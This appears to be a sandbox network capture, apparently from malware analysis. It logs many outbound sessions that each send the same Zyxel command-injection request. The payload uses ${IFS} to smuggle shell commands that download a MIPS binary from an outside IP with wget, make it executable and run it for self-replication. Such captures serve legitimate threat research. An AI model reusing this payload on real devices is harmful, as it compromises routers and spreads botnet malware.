                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753901005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7912192.168.2.1347988174.238.150.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753973961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7913192.168.2.134949480.7.104.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753988981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7914192.168.2.1347724150.142.64.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754076004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7915192.168.2.1359020210.219.236.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754105091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7916192.168.2.1350406143.183.165.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754128933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7917192.168.2.1344482112.18.48.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754182100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7918192.168.2.1341542151.42.197.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754242897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7919192.168.2.1334456184.143.108.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754256964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7920192.168.2.133548219.118.179.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754302979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7921192.168.2.1353940146.95.227.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754339933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7922192.168.2.1356262108.100.192.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754381895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7923192.168.2.1339956134.232.111.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754405975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7924192.168.2.136011276.199.49.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754437923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7925192.168.2.1344302216.214.152.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754475117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7926192.168.2.1360084206.180.253.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754511118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7927192.168.2.135632614.44.29.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754565001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7928192.168.2.1333460200.92.210.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754589081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7929192.168.2.1340488119.63.83.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754632950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7930192.168.2.1348212101.110.107.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754678965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7931192.168.2.1338070175.211.209.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754719973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7932192.168.2.1339832191.0.121.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754776955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7933192.168.2.13503921.202.30.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754823923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7934192.168.2.134811676.135.180.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754846096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7935192.168.2.1338202149.68.154.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754915953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7936192.168.2.1351290161.148.69.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754936934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7937192.168.2.134008224.16.103.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.754970074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7938192.168.2.1341510139.107.170.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755028963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7939192.168.2.1359078168.93.228.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755054951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7940192.168.2.1358438149.12.242.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755086899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7941192.168.2.1351246146.231.90.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755125046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7942192.168.2.1346976221.123.216.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755161047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7943192.168.2.1360196204.155.78.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755219936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7944192.168.2.134111845.231.85.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755258083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7945192.168.2.135029252.144.11.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755290985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7946192.168.2.1335944170.232.222.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755315065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7947192.168.2.135852077.110.127.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755373955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7948192.168.2.1338760122.47.127.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755403042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7949192.168.2.1347988125.119.169.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755439043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7950192.168.2.1336782189.74.62.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755471945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7951192.168.2.134470836.149.15.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755520105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7952192.168.2.133891891.129.101.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755551100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7953192.168.2.133477884.28.10.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755594969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7954192.168.2.1339842114.34.58.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755639076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7955192.168.2.1334668151.155.114.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755662918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7956192.168.2.1341604131.151.53.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755705118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7957192.168.2.133386437.104.221.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755740881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7958192.168.2.134954689.80.118.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755785942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7959192.168.2.1353714170.34.157.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755820990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7960192.168.2.1358792140.189.182.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755850077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7961192.168.2.133684249.51.91.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755886078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7962192.168.2.1344928101.132.84.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755909920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7963192.168.2.1342930202.193.125.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.755969048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7964192.168.2.1359704161.247.184.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756016970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7965192.168.2.1340862146.63.228.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756062031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7966192.168.2.1347728146.202.198.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756103992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7967192.168.2.135993238.69.101.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756136894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7968192.168.2.135294636.49.147.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756161928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7969192.168.2.135949099.6.182.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756221056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7970192.168.2.1337754104.196.65.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756264925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7971192.168.2.1354182157.28.16.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756308079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7972192.168.2.1355062205.202.75.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756357908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7973192.168.2.133970864.157.54.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756390095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7974192.168.2.135002692.200.52.125443
                                        TimestampBytes transferredDirectionData
